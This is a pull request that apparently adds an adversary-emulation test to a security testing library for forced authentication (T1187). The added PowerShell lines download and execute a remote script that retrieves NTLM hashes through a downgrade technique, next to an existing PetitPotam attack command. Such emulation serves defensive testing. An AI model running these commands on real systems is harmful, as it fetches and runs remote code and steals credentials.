### PR TITLE
Update T1187.yaml

### DIFF
--- a/atomics/T1187/T1187.yaml
+++ b/atomics/T1187/T1187.yaml
@@ -39,3 +39,12 @@ atomic_tests:
     command: |
       & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
       Write-Host "End of PetitPotam attack"
+- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+  description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+      Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+    name: powershell


### PR DESCRIPTION
**Details:**
PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn

**Testing:**
windows 10

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->